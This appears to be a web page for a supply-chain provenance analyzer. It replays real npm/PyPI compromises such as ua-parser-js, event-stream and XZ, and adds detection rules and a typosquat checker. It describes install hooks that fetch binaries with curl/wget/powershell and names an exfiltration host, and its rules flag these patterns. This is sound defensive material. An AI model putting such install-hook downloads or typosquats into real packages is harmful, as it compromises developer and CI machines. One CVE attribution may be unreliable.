Supply Chain

Real package-registry compromises, replayed against a live provenance analyzer. Every scenario reproduces a public incident — event-stream, ua-parser-js, node-ipc, 3CX, XZ, Ultralytics, LottieFiles, tj-actions — using the metadata signals that distinguished the poisoned version from the clean one.

How this works. Each scenario seeds a plausibly-real package.json and registry response into the editors below. Edit either field and the analyzer re-runs live: add an install script with a curl, change the publisher IP between versions, drop the attestations array, mark a maintainer's 2FA off. Watch the seven rules (PROV01–PROV07) light up in real time. Use the typosquat checker at the bottom to test any package name against a list of 40+ popular names.

Real incident replicas

Click a card to load that incident's metadata into the editors. The fields are editable from there — try fixing the malicious one or breaking a clean one.

What you're looking at. Account-takeover: maintainer's npm token leaked. Patch published from a new IP, with a postinstall hook that downloads a binary.

Expected: PROV01 (network in install hook) + PROV03 (new publisher IP) + PROV04 (no provenance) all fire.

real-world details — ua-parser-js (2021-10, CVE-2021-44906)

Vector. Maintainer's npm account compromised via leaked credential. Attacker published 0.7.29, 0.8.0, 1.0.0 with a postinstall hook that downloaded a Linux/Windows cryptominer and a Windows credential stealer (DanaBot).

Payload. preinstall.sh / preinstall.bat → downloads jsextension binary → starts XMRig miner + Lazarus-affiliated DanaBot stealer on Windows.

Blast radius. ua-parser-js had 7M weekly downloads. Used transitively by Facebook, Microsoft, Amazon, Reddit, Slack, Discord. Affected versions live in registry for ~4 hours.

refs: github.com · nvd.nist.gov · www.cisa.gov

package.json + registry response (editable)

package.json

registry metadata (JSON)

Try editing fields to see rules fire/clear: add a preinstall script with curl → PROV01. Change one version's publisherIp → PROV03. Delete an attestations array → PROV04. Set twoFactor to false on a recent maintainer → PROV06.

Provenance findings (3)

criticalPROV01 — Install hook fetches code from the network

A pre/install/postinstall script invokes curl/wget/powershell to download remote code at install time. This is the ua-parser-js / lottie-player playbook: install hook downloads payload, runs it on every developer + CI machine.

fix: If you control the package: replace install hooks with explicit lifecycle docs. If you're a consumer: install with --ignore-scripts and pin via SHA, or use a private mirror that strips install scripts.

mediumPROV03 — Latest publish from a new IP

Latest version published from 45.134.20.x; previous from 180.252.7.x. Account-takeover incidents (ua-parser-js 2021) typically show a publish from an unfamiliar geo on the malicious version.

fix: Cross-check with the maintainer's stated workflow. Require npm provenance / Sigstore attestation tying the build to a known CI runner.

highPROV04 — Latest version has no verified build provenance

No verified Sigstore / npm-provenance / in-toto attestation links this artifact to a known CI builder + source commit. You're trusting the registry alone. Ultralytics 8.3.41 (2024) shipped without provenance and the wheel SHA differed from a clean source build.

fix: Pin to versions that publish provenance. For npm, use `npm install --foreground-scripts=false` and `npm audit signatures`. For PyPI, prefer projects publishing PEP 740 attestations.

Typosquat checker

Paste any npm or PyPI package name. The checker computes Levenshtein distance against 40+ popular packages and flags any neighbour within edit-distance 2 — the same heuristic used by registry abuse-detection teams.

Documented typosquat patterns

Patterns the analyzer's PROV07 rule scores against. Drawn from documented real incidents where possible.

lodashloadashsingle-letter insertion · loadash (npm) repeatedly republished by malware authors 2017–2024

lodashlodahstransposition

requestrequetstransposition

react-nativereact-natvesingle-letter omission

discord.jsdiscord.devTLD-style swap on package name · Multiple 2023 npm campaigns

pyyamlpyyamIhomoglyph (capital I instead of lowercase l)

tensorflowtensorlfowtransposition

coloramacolouramabritish-english spelling · PyPI 2017 — PoC by Bertus, later used by attackers

typing-extensionstyping_extensionsunderscore-vs-dash on PyPI (different packages)

cross-envcrossenvdash removal · crossenv (npm 2017) — exfiltrated env vars to npm.hacktask.net

Incident reading list

event-stream → flatmap-stream → bitcoin wallet exfil (Copay) (2018-11) · advisory
ua-parser-js account takeover → cryptominer + password stealer (2021-10, CVE-2021-44906) · advisory
node-ipc protestware wipes files on RU/BY hosts (peacenotwar) (2022-03, CVE-2022-23812) · advisory
3CX double supply-chain (X_TRADER → 3CX → 600k customers) (2023-03) · advisory
XZ Utils backdoor (Jia Tan, multi-year social-engineering) (2024-03, CVE-2024-3094) · advisory
Ultralytics PyPI build-cache poisoning → XMRig (2024-12) · advisory
LottieFiles npm token leak → web3 wallet drainer (2024-10) · advisory
tj-actions/changed-files retroactive tag-rewrite (CI secret theft) (2025-03, CVE-2025-30066) · advisory